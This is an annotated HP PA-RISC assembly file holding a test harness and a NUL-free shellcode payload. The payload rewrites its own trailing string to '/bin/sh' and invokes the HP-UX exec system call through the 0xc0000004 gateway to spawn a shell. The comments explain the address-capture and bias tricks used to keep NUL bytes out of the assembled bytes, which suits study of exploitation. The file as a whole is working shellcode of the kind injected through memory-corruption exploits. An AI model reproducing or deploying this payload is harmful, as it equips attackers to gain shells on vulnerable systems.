; Test harness (HP PA-RISC assembler syntax): main only branches into the
; payload at `shellcode`; no instruction follows the delay-slot nop.
.SPACE $TEXT$
.SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
.align 4
.EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
main
bl shellcode, %r1 ; branch-and-link to the payload; the link address lands in %r1
nop ; fills the branch delay slot
; Payload: terminates the string at SHELL in place, then enters the entry
; point at 0xc0000004 with %r26 = address of SHELL, %r25 = 0 and %r22 = 11.
;
; Review notes grounded in the code below:
;  - The code is assembled into $DATA$ and patches its own trailing string
;    with stb, so it depends on that memory being writable AND executable;
;    a non-executable data mapping stops it before the first instruction.
;  - Constants are built indirectly (+500/-500 bias, 511-500, xor to zero,
;    'A' placeholder) -- presumably so the assembled bytes contain no NUL;
;    TODO confirm against the assembled output.
;  - The -11 in the displacements implies %r1 = shellcode+11 after the first
;    bl (link address shellcode+8 with the PRIV_LEV=3 bits in the low two
;    bits) -- confirm in a debugger.
.SUBSPA $DATA$
.EXPORT shellcode; exported only so the label is visible in a debugger
shellcode
bl .+4,%r1 ; branch to the next instruction just to capture the current address in %r1
addi 500, %r1, %r3; %r3 = %r1 + 500; the bias is cancelled by the -500 in each offset below
; Store a zero byte (%r0) over the last character of the string. With
; %r1 = shellcode+11 the effective address is SHELL+7, i.e. the 'A'.
stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
xor %r25, %r25, %r25; %r25 = 0: NULL -> arg1
ldi SHELL-shellcode-11-500, %r26; %r26 = offset of SHELL from the captured address, minus the bias
add %r3, %r26, %r26; %r26 = %r3 + offset = address of SHELL (bias and -11 cancel)
ldil L%0xc0000000,%r1; %r1 = 0xc0000000, base of the entry point branched to below
ldi 500, %r22 ; first half of the call number; completed in the delay slot
ble 0x4(%sr7,%r1) ; branch-and-link external to 0xc0000004 in space %sr7
; Delay slot of the ble, so it executes before the branch target:
; %r22 = 511 - 500 = 11. NOTE(review): presumably the exec call number;
; verify against the HP-UX system call table.
subi 511, %r22, %r22 ;
SHELL
.STRING "/bin/shA"; trailing 'A' is a placeholder that the stb above overwrites with 0
endofshellcode